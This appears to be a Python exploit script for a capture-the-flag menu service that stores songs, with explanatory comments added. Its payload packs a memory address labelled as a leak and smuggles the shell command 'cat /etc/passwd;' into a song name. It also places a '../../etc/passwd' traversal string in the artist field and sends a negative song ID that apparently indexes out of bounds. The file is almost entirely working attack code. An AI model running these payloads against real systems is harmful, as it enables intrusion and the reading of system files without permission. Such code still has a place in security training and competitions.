import socket
from struct import pack,unpack
from ctypes import c_int32
import telnetlib,time
# Target endpoints. REMOTE looks like the live challenge service and LOCAL a
# lab instance (presumably the same binary; verify before switching). Only
# LOCAL is connected to below -- swap it for REMOTE to run against the host.
REMOTE = ("54.92.45.49", 32902)
LOCAL = ("192.168.55.128", 31337)

# Maximum number of bytes pulled per recv() call in recv_until().
BUFFER = 4096

# Single TCP connection shared by every send/recv in this script.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(LOCAL)
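def recv_until(marker, debug=1, sock=None, bufsize=None):
    """Read from the connection until ``marker`` appears in the received data.

    Args:
        marker: substring to wait for. A ``str`` is encoded to bytes on
            Python 3 so it can be searched in the byte buffer; on Python 2
            ``str`` already is bytes and is used as-is.
        debug: when truthy, every chunk received is printed as it arrives.
        sock: socket-like object with ``recv(n)``; defaults to the module
            level connection ``s``.
        bufsize: bytes requested per ``recv`` call; defaults to ``BUFFER``.

    Returns:
        Everything received up to and including the chunk that contained
        ``marker`` (there may be trailing data after the marker).

    Raises:
        EOFError: the peer closed the connection before ``marker`` was seen.
            The original loop kept calling ``recv`` on a closed socket, which
            returns ``''`` forever and spun without ever returning.
    """
    conn = s if sock is None else sock
    size = BUFFER if bufsize is None else bufsize
    # Python 3 only: str marker vs bytes buffer would raise TypeError in `in`.
    if isinstance(marker, str) and not isinstance(marker, bytes):
        marker = marker.encode()
    buf = b''
    while marker not in buf:
        chunk = conn.recv(size)
        if not chunk:
            # Empty read == orderly shutdown by the peer; fail loudly instead
            # of busy-looping, so a crashed target is visible immediately.
            raise EOFError('connection closed before %r was received' % (marker,))
        buf += chunk
        if debug:
            print(chunk)
    return buf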
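# Exploit driver. This talks a menu protocol with the target service; the
# interpretation of each step below is inferred from the prompts the script
# waits for and from the original author's "leak" comment -- confirm against
# the binary before relying on it. Run this only against targets you are
# authorised to test.
#
# Changes vs. the original: every write uses sendall() (send() may write only
# part of the buffer on a TCP socket, silently truncating a payload), and the
# socket is closed in a finally block so it is released on any exception.


def _create_song(song_name, artist, size='8', lyric='a'):
    """Drive menu option 1 (create song) with the given field values.

    Each value is sent as one line after the matching prompt is seen; the
    prompts waited for are the same as in the original script.
    """
    s.sendall('1\n')
    recv_until('Name:')
    s.sendall(song_name + '\n')
    recv_until('Artist')
    s.sendall(artist + '\n')
    recv_until('size')
    s.sendall(size + '\n')
    recv_until('Lyric')
    s.sendall(lyric + '\n')
    recv_until('Exit')


try:
    ## CREATE SONG 1: long filler name/artist (239 bytes each); presumably
    ## shapes the heap/buffer layout for the second song -- TODO confirm.
    filler = "a" * 239
    _create_song(filler, filler)

    ## CREATE SONG 2: the actual payload. The name starts with two packed
    ## 32-bit values (0x0804b014 is commented "leak" by the author; it looks
    ## like a data-section address the service reads back -- verify), then a
    ## shell command fragment padded with '/' to 94 bytes, which suggests the
    ## name ends up inside a shell command line. The artist field is a
    ## "../../etc/passwd" traversal string.
    payload = pack('<I', 0x0804b014)   # leak (original comment)
    payload += pack('<I', 0x41414141)
    payload += "cat /etc/passwd;"
    payload = payload.ljust(94, '/')
    _create_song(payload, "../../etc/passwd")

    ## MENU OPTION 4: prompts for a name, then repeatedly for an ID. The
    ## sequence 0,0,0,0,1 then -1 is sent verbatim from the original; the
    ## negative ID presumably hits an unchecked index -- confirm.
    s.sendall('4\n')
    recv_until('name')
    s.sendall('hihi\n')
    for song_id in ('0', '0', '0', '0', '1', '-1'):
        recv_until('ID')
        s.sendall(song_id + '\n')
    recv_until('Exit')

    ## MENU OPTION 7: presumably the step that triggers the prepared
    ## payload; the script only waits for the menu to reappear.
    s.sendall('7\n')
    recv_until('Exit')
finally:
    s.close()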